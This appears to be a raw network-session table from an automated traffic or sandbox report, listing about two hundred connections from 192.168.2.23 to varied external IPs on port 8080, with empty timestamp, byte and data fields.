                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36724192.168.2.2357400162.190.213.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36725192.168.2.2359214123.136.157.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36726192.168.2.2345038148.134.32.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36727192.168.2.2356284199.125.249.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36728192.168.2.234752284.170.178.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36729192.168.2.2360026183.30.146.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36730192.168.2.2352188139.129.99.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36731192.168.2.2358818171.143.233.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36732192.168.2.2355428141.74.173.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36733192.168.2.2358144206.172.197.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36734192.168.2.2335618217.173.223.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36735192.168.2.2333014205.129.218.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36736192.168.2.2335666117.130.143.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36737192.168.2.23498265.146.70.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36738192.168.2.233382045.61.254.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36739192.168.2.234922070.123.214.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36740192.168.2.2352950173.186.72.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36741192.168.2.236086041.141.168.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36742192.168.2.233629663.104.132.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36743192.168.2.233778269.143.161.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36744192.168.2.235532871.54.106.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36745192.168.2.2349998148.18.52.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36746192.168.2.2349786144.6.178.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36747192.168.2.2341190111.162.117.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36748192.168.2.234487659.54.106.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36749192.168.2.2345778122.84.88.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36750192.168.2.2346880102.97.57.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36751192.168.2.2343752177.243.174.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36752192.168.2.233504461.18.27.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36753192.168.2.233897051.81.38.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36754192.168.2.2338634198.0.11.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36755192.168.2.233876014.40.240.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36756192.168.2.2360902157.98.62.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36757192.168.2.233321651.109.133.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36758192.168.2.2344524139.106.13.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36759192.168.2.233676247.11.151.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36760192.168.2.234991852.17.126.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36761192.168.2.2355942162.126.160.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36762192.168.2.2342698161.117.171.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36763192.168.2.2358022107.157.50.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36764192.168.2.2334676221.237.163.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36765192.168.2.2343080110.150.216.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36766192.168.2.234156443.121.205.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36767192.168.2.2347214192.69.94.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36768192.168.2.2348204168.142.112.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36769192.168.2.235012278.28.128.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36770192.168.2.234970647.208.95.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36771192.168.2.234578690.110.28.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36772192.168.2.2354598142.42.162.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36773192.168.2.235958817.96.144.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36774192.168.2.234787490.23.181.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36775192.168.2.2337732147.90.66.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36776192.168.2.2344058185.68.2.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36777192.168.2.2350996185.79.170.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36778192.168.2.235706646.125.182.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36779192.168.2.233769887.251.207.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36780192.168.2.2357820132.7.72.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36781192.168.2.235915437.130.153.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36782192.168.2.234290669.76.186.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36783192.168.2.2336682141.213.192.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36784192.168.2.235068466.221.218.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36785192.168.2.2358676148.213.169.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36786192.168.2.2347100197.32.109.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36787192.168.2.2349462119.7.219.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36788192.168.2.2337810154.217.15.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36789192.168.2.2333432174.73.88.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36790192.168.2.2335108188.21.247.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36791192.168.2.2360074147.172.204.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36792192.168.2.2351882180.171.115.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36793192.168.2.2354218154.243.110.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36794192.168.2.2352302166.239.89.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36795192.168.2.233558270.229.245.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36796192.168.2.2356800129.37.254.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36797192.168.2.2334332134.99.101.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36798192.168.2.2345380110.244.174.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36799192.168.2.23339268.100.229.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36800192.168.2.233852888.54.110.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36801192.168.2.235766450.11.78.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36802192.168.2.235673075.224.110.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36803192.168.2.2335946105.4.28.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36804192.168.2.2356590105.146.234.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36805192.168.2.235038049.168.204.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36806192.168.2.2347642144.245.88.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36807192.168.2.2355720194.223.116.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36808192.168.2.235976448.102.139.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36809192.168.2.233345648.31.164.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36810192.168.2.2358022173.10.225.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36811192.168.2.23408282.55.194.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36812192.168.2.234284025.169.68.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36813192.168.2.235029494.115.46.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36814192.168.2.234377251.219.239.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36815192.168.2.234031617.124.10.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36816192.168.2.234626472.247.146.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36817192.168.2.2354046188.22.67.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36818192.168.2.235528874.226.89.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36819192.168.2.2335376173.7.25.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36820192.168.2.234011472.208.74.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36821192.168.2.233743495.24.140.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36822192.168.2.235731819.145.151.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36823192.168.2.2338628103.204.195.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36824192.168.2.2352996101.198.137.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36825192.168.2.236064254.44.124.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36826192.168.2.2335892145.123.43.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36827192.168.2.2360336222.206.14.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36828192.168.2.2343650194.175.117.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36829192.168.2.2341304128.149.79.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36830192.168.2.2341568126.148.118.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36831192.168.2.235710824.159.221.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36832192.168.2.2337726100.25.113.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36833192.168.2.2335226115.126.24.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36834192.168.2.2343214109.157.134.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36835192.168.2.2349254162.164.4.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36836192.168.2.236093624.165.180.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36837192.168.2.2347508147.21.94.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36838192.168.2.235443684.204.199.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36839192.168.2.2349374134.13.23.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36840192.168.2.235658264.239.173.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36841192.168.2.2354318152.1.213.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36842192.168.2.234293462.90.114.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36843192.168.2.2347872117.37.6.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36844192.168.2.2355776137.5.152.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36845192.168.2.2346690153.223.78.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36846192.168.2.2351364118.183.15.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36847192.168.2.23504668.94.174.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36848192.168.2.2353620170.48.158.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36849192.168.2.235939457.33.8.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36850192.168.2.235279838.138.165.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36851192.168.2.2333990221.248.235.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36852192.168.2.235463270.65.108.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36853192.168.2.2348762118.44.156.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36854192.168.2.2338288203.248.80.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36855192.168.2.235540695.121.121.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36856192.168.2.2347370179.233.111.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36857192.168.2.235921083.49.30.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36858192.168.2.2354274194.88.240.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36859192.168.2.2338294106.54.200.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36860192.168.2.2358196103.240.132.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36861192.168.2.2348252208.254.20.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36862192.168.2.233920841.56.189.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36863192.168.2.2339878155.249.237.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36864192.168.2.2347930195.15.85.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36865192.168.2.2349042125.18.55.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36866192.168.2.2347826102.63.85.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36867192.168.2.234256012.23.83.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36868192.168.2.233853674.192.235.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36869192.168.2.235236498.11.0.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36870192.168.2.234577432.181.26.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36871192.168.2.2357160222.21.41.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36872192.168.2.2345236142.61.133.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36873192.168.2.235868087.226.16.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36874192.168.2.2343460193.133.84.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36875192.168.2.2339854204.3.149.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36876192.168.2.2349596117.3.52.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36877192.168.2.2357398122.183.196.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36878192.168.2.2332904148.214.97.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36879192.168.2.234187082.85.46.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36880192.168.2.2354324154.184.15.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36881192.168.2.2333432100.31.126.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36882192.168.2.2345850139.32.20.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36883192.168.2.2339354196.252.31.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36884192.168.2.235578224.165.120.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36885192.168.2.234266250.88.199.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36886192.168.2.2350102143.250.115.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36887192.168.2.234554072.31.83.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36888192.168.2.235478214.140.80.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36889192.168.2.233319235.69.71.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36890192.168.2.233604293.67.52.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36891192.168.2.235466688.130.90.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36892192.168.2.235668490.73.84.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36893192.168.2.2333112128.128.183.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36894192.168.2.2335942113.221.174.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36895192.168.2.235032617.151.58.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36896192.168.2.233996068.0.14.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36897192.168.2.2349712177.14.8.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36898192.168.2.2336566114.201.30.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36899192.168.2.2332970199.250.254.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36900192.168.2.234604873.167.229.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36901192.168.2.233748072.161.10.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36902192.168.2.2339328102.223.69.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36903192.168.2.235545668.116.238.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36904192.168.2.2356848149.218.215.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36905192.168.2.234831032.15.19.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36906192.168.2.2332974201.32.130.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36907192.168.2.236004045.118.39.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36908192.168.2.2347608103.105.163.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36909192.168.2.234473032.223.151.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36910192.168.2.2339094163.76.195.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36911192.168.2.2353232117.26.7.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36912192.168.2.2340444212.89.217.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36913192.168.2.2337986155.159.89.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36914192.168.2.2339362200.170.210.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36915192.168.2.2355882186.58.210.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36916192.168.2.2347678112.241.97.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36917192.168.2.235125250.217.65.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36918192.168.2.2335688201.151.206.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36919192.168.2.2334660203.216.32.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36920192.168.2.235343234.165.149.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36921192.168.2.2345074152.135.147.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36922192.168.2.2334426149.239.127.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36923192.168.2.2335744185.120.233.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36924192.168.2.2342812223.231.135.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36925192.168.2.2333460211.37.9.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36926192.168.2.2356378147.59.17.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36927192.168.2.23366668.172.174.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36928192.168.2.235356032.212.77.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36929192.168.2.2337992136.211.247.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36930192.168.2.2344792122.241.76.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36931192.168.2.2352800207.55.131.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36932192.168.2.235666090.42.196.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36933192.168.2.233865827.107.16.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
